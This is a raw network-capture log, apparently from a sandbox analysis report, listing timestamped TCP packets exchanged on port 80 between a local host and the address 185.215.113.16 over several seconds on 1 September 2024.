Sep 1, 2024 20:09:41.937814951 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.937829971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.938005924 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298113108 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298151016 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298166037 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298190117 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298218012 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298286915 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298310041 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298326969 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298329115 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298353910 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298355103 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298372984 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298391104 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298774004 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298789024 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298804045 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298815012 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298820019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298830032 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298841953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298851013 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298856020 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.298873901 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298885107 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.298903942 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.459723949 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.459753036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.459888935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.459888935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.808118105 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.808150053 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.808178902 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.808204889 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.952605009 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.952666044 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.952686071 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.952708006 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.952790022 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.952835083 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.952946901 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.952961922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.952979088 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:42.952992916 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:42.953016996 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.037287951 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.037409067 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.037446976 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.037518978 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.120925903 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.120969057 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.121128082 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.121128082 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.205384016 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.205439091 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.205537081 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.205584049 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.289800882 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.289858103 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.289964914 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.289964914 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.305907011 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.305979013 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.305994034 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.306076050 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.306076050 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.306076050 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.420902967 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.420945883 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.420983076 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.421030998 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.506941080 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.507069111 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.507121086 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.507145882 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.509031057 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.509057045 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.509072065 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.509105921 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.509174109 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.682805061 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.682952881 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.683094978 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.683142900 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.728730917 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.728789091 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.728811026 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.728827000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.728951931 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.728951931 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.728995085 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.729046106 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.900763988 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.900852919 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.900867939 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.900947094 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.900947094 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.900947094 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.901114941 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.901132107 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:43.901159048 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:43.901173115 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.110800028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.110980988 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.111120939 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.111135006 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.111175060 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.111207962 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.111223936 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.111253977 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.111279011 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.111459017 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.111471891 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.111486912 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.111506939 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.111522913 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.111599922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.111614943 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.111645937 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.111656904 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.544224024 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.544289112 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.544297934 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.544312000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.544333935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.544347048 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.544539928 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.544555902 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.544569969 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.544584036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.544589996 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.544600010 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.544606924 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.544619083 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.544636965 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.544652939 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.544912100 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.544950962 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.545041084 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.545085907 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.545125008 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.545141935 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.545167923 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.545183897 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.545340061 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.545356035 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.545381069 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.545392990 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.545751095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.545766115 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.545802116 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.545814037 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.545825958 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.545842886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.545905113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549179077 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549228907 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549237967 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549252033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549278975 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549289942 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549427032 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549442053 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549455881 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549462080 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549478054 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549487114 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549565077 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549588919 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549607038 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549624920 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549722910 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549736977 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549751997 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549760103 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549767971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.549773932 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549792051 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.549814939 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.550019026 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.550060987 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.550097942 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.550112963 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.550127029 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.550136089 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.550154924 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.550165892 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.729665995 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.729696989 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.729712963 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.729748964 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.729898930 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.729964018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.729979038 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.729993105 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.730006933 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.730021954 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.730040073 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.730113029 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.938534975 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.938601017 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.938646078 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.938661098 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.938699961 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.938715935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.938800097 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.938833952 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.938838959 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.938855886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.938878059 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.938879967 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.938903093 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.938915014 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.939276934 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.939292908 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.939306974 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:44.939318895 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.939341068 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:44.939354897 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:45.750353098 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:45.750390053 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:45.750435114 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:45.750458002 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:45.946118116 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:45.946177006 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:45.946191072 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:45.946291924 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:45.946302891 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:45.946302891 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:45.946304083 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:45.946340084 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.141366005 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.141446114 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.141453028 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.141463041 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.141489029 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.141510963 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.225600958 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.225641012 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.225677967 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.225716114 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.343857050 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.343919039 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.343935013 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.343935013 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.343967915 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.343974113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.344057083 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.344094992 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.344130039 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.344145060 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.344160080 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.344170094 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.344180107 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.344202042 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.428117990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.428173065 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.428225994 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.428271055 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.555743933 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.555864096 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.555874109 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.555934906 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.555948019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.555958033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.555958986 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.556066036 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.592504978 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.592576981 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.592586040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.592689037 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.592756033 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.592987061 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.746565104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.746629953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.746639967 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.746771097 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.746782064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.746804953 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.746804953 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.746822119 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.746900082 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.746910095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.746937037 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.777337074 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.777388096 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.777398109 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.777400970 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.777431965 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.831191063 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.831216097 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.831239939 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.831252098 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.939677954 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.939780951 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.939793110 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.939867020 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.939867020 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.939867020 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:46.939944029 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:46.939990997 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:47.025363922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:47.025398970 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:47.025535107 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:47.687058926 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:47.687124968 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:47.687273979 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:47.687273979 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:47.879142046 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:47.879156113 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:47.879168034 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:47.879231930 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:47.879245043 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:47.879255056 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:47.879317999 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:47.879317999 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:47.879317999 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:47.880623102 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.087420940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.087447882 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.087626934 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.140160084 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.140203953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.140213013 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.140383005 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.140383005 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.140450954 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.140494108 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.140615940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.140657902 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.285119057 CEST	80	49738	185.215.113.16	192.168.2.4
